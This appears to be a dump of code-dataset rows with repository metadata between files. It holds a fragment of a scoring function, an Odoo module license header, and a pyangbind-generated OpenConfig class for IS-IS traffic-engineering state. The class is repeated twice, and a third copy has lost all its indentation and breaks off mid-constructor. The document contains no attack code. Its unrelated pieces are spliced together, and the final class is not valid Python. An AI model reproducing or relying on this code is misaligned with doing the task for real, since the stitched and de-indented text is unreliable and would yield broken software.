        score = (X - sub) / (dev + 1e-10)
        return abs(score) if self.absolute else score
| [
"yilmazselimfirat@gmail.com"
] | yilmazselimfirat@gmail.com |
1472d32a4b5d251e86c90bb8047f947c76ee319e | 31ba27461d50fcd85027318eacefa04d828feb4b | /addons/web-addons/__unported__/web_percent/__init__.py | 658c115ad64576f6692ee844b890b5666bbf1ba0 | [] | no_license | TinPlusIT05/tms | 5f258cec903d5bf43c26b93fc112fce0b32de828 | 673dd0f2a7c0b69a984342b20f55164a97a00529 | refs/heads/master | 2022-12-04T02:11:54.770745 | 2019-09-23T07:18:11 | 2019-09-23T07:18:11 | 210,278,672 | 0 | 0 | null | 2022-11-22T00:30:37 | 2019-09-23T06:18:48 | Python | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 TeMPO Consulting (<http://www.tempo-consulting.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| [
"Tinplusit05@gmail.com"
] | Tinplusit05@gmail.com |
c9e7539b202b1738a137cfccd61c1f9be308fe28 | 70cdf0741a22c678401a306229003bf036ffe5a6 | /ocbind/network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/__init__.py | a68fd130b13467316ffbc9fb71519d044dcfca4e | [] | no_license | zsblevins/nanog81-hackathon | 5001e034339d6b0c6452ae2474f06916bcd715cf | 1b64fd207dd69837f947094fbd6d6c1cea3a1070 | refs/heads/main | 2023-03-03T09:39:28.460000 | 2021-02-15T13:41:38 | 2021-02-15T13:41:38 | 336,698,856 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,682 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  YANG Description: This container defines ISIS TE state information.
  """
  # NOTE: auto-generated pyangbind binding — do not hand-edit the logic here;
  # regenerate from the YANG model instead. __slots__ limits instances to the
  # path-helper plumbing plus the three operational-state (config false) leaves
  # declared below: enabled, ipv4-router-id, ipv6-router-id.
  __slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)

  _yang_name = 'state'
  _pybind_generated_by = 'container'

  # Accepts at most one positional argument: another binding object exposing
  # the same _pyangbind_elements; any leaf reported as changed on it is copied
  # into this instance via the corresponding _set_* method.
  def __init__(self, *args, **kwargs):

    self._path_helper = False

    self._extmethods = False
    # Each leaf is wrapped in YANGDynClass, which enforces the YANG type
    # restrictions (the regex patterns below come from the inet: typedefs).
    self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
    self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
    self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)

    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      # Verify the source object carries every element before copying anything.
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  # Path of this container in the YANG data tree, built by walking parents
  # when attached, otherwise falling back to the static schema path.
  def _path(self):
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']

  def _get_enabled(self):
    """
    Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)

    YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
    """
    return self.__enabled
      
  def _set_enabled(self, v, load=False):
    """
    Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_enabled is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_enabled() directly.

    YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
      # Type-coercion failure is re-raised with the schema context attached.
      raise ValueError({
          'error-string': """enabled must be of a type compatible with boolean""",
          'defined-type': "boolean",
          'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
        })

    self.__enabled = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_enabled(self):
    self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)


  def _get_ipv4_router_id(self):
    """
    Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)

    YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
    """
    return self.__ipv4_router_id
      
  def _set_ipv4_router_id(self, v, load=False):
    """
    Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ipv4_router_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ipv4_router_id() directly.

    YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
          'defined-type': "inet:ipv4-address-no-zone",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
        })

    self.__ipv4_router_id = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ipv4_router_id(self):
    self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)


  def _get_ipv6_router_id(self):
    """
    Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)

    YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
    """
    return self.__ipv6_router_id
      
  def _set_ipv6_router_id(self, v, load=False):
    """
    Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ipv6_router_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ipv6_router_id() directly.

    YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
          'defined-type': "inet:ipv6-address-no-zone",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
        })

    self.__ipv6_router_id = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ipv6_router_id(self):
    self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)

  # Read-only property surface; the leaves are state (config false), so no
  # public setters are exposed.
  enabled = __builtin__.property(_get_enabled)
  ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
  ipv6_router_id = __builtin__.property(_get_ipv6_router_id)


  _pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  YANG Description: This container defines ISIS TE state information.
  """
  # NOTE(review): this is the openconfig-network-instance-l2 variant of the
  # same container. The module defines a class named 'state' more than once at
  # module scope, so this definition shadows the one generated above when the
  # module is imported — a known artifact of pyangbind output.
  __slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)

  _yang_name = 'state'
  _pybind_generated_by = 'container'

  # Accepts at most one positional argument: another binding object exposing
  # the same _pyangbind_elements; any leaf reported as changed on it is copied
  # into this instance via the corresponding _set_* method.
  def __init__(self, *args, **kwargs):

    self._path_helper = False

    self._extmethods = False
    self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
    self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
    self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)

    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      # Verify the source object carries every element before copying anything.
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  # Path of this container in the YANG data tree, built by walking parents
  # when attached, otherwise falling back to the static schema path.
  def _path(self):
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']

  def _get_enabled(self):
    """
    Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)

    YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
    """
    return self.__enabled
      
  def _set_enabled(self, v, load=False):
    """
    Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_enabled is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_enabled() directly.

    YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
      # Type-coercion failure is re-raised with the schema context attached.
      raise ValueError({
          'error-string': """enabled must be of a type compatible with boolean""",
          'defined-type': "boolean",
          'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
        })

    self.__enabled = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_enabled(self):
    self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)


  def _get_ipv4_router_id(self):
    """
    Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)

    YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
    """
    return self.__ipv4_router_id
      
  def _set_ipv4_router_id(self, v, load=False):
    """
    Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ipv4_router_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ipv4_router_id() directly.

    YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
          'defined-type': "inet:ipv4-address-no-zone",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
        })

    self.__ipv4_router_id = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ipv4_router_id(self):
    self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)


  def _get_ipv6_router_id(self):
    """
    Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)

    YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
    """
    return self.__ipv6_router_id
      
  def _set_ipv6_router_id(self, v, load=False):
    """
    Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ipv6_router_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ipv6_router_id() directly.

    YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
          'defined-type': "inet:ipv6-address-no-zone",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
        })

    self.__ipv6_router_id = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ipv6_router_id(self):
    self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)

  # Read-only property surface; the leaves are state (config false), so no
  # public setters are exposed.
  enabled = __builtin__.property(_get_enabled)
  ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
  ipv6_router_id = __builtin__.property(_get_ipv6_router_id)


  _pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
